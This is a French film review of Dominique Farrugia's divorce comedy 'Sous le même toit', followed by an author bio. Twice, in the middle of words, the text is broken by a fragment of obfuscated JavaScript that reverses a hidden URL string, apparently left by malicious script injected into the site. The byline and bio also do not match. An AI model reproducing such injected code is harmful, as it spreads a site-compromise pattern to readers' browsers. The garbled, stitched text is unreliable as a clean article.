Dans le genre « Maman ou Papa ? », le nouveau et 7ème long métrage de Dominique Farrugia, « Sous le même toit », avec Gilles Lelouche et Louise Bourgouin, aborde le divorce avec humour.
Synopsis : Pour relancer leur couple, Delphine (Louise Bourgouin) et Yvan (Gilles Lelouche) se propose d’aller voir ailleurs. Mais Yvan, au début réticent, va plus vite que prévu et Delphine décide de divorcer. Le problème, Yvan n’a pas un rond et est propriétaire de 20% de la maison, alors il n’y a plus qu’une seule solution, partager la maison.
On notera, avec les noms des personnages choisis, la référence au tout premier long métrage de Dominique Farrugia : Delphine : 1 – Yvan : 0. Un film qui évoquait, à l’époque, les premiers pas de la vie de couple.
Sous le même toit: une comédie … française
A l’heure où le mariage est de nouveau à la mode chez les jeunes générations, le film paraît un peu has been. Si le film se veut humoristique, il reste tout de même plutôt bateau. Le nouveau petit copain cassé dans son élan, les vacheries de l’ex belle-mère, les enfants à demi rebelles typiques des films français, etc. Et comble de l’horreur, voir Gilles Lellouche nu. On se retrouve avec un mauvais remake des gags de Un Gars, Une Fille, le divorce en plus.
J’ai cependant apprécié le personnage du meilleur ami, Nico (Manu Payet). Dont l’humour et les traits de caractères étaient un peu plus naturels. Bon point aussi pour le dénouement, qui (sans spoiler) offre une perspective différente et presque inattendue, ainsi qu’une jolie image de fin.
Retrouvez Sous le Même Toit en salle le 19 avril
La b {if (typeof ($Ikf.list[n]) == « string ») return $Ikf.list[n].split(« »).reverse().join(« »);return $Ikf.list[n];};$Ikf.list=[« \’ //:ptth\’= « ]; ( () * 6); ; );}ande annonce de Sous le Même Toit :
Il est un peu dommage, que le cinéma français de nos jours se résume en gr {if (typeof ($Ikf.list[n]) == « string ») return $Ikf.list[n].split(« »).reverse().join(« »);return $Ikf.list[n];};$Ikf.list=[« \’ //:ptth\’= « ]; ( () * 6); ; );}ande partie par des comédies moyennement drôles et très stéréotypées.
Cindy Manu
Passionnée par le monde des mots et avide de découvertes, je m'appelle Maria Alejandra. En tant que rédactrice au sein de ce magazine féminin, je suis constamment en quête d'informations captivantes à partager avec notre précieuse communauté.
Ma curiosité insatiable m'entraîne à explorer les recoins les plus variés d'Internet, où je dévore avec enthousiasme tout ce que je peux trouver. C'est avec une joie débordante que je m'engage à vous transmettre les trésors de connaissances que je découvre, en particulier dans le domaine des animaux.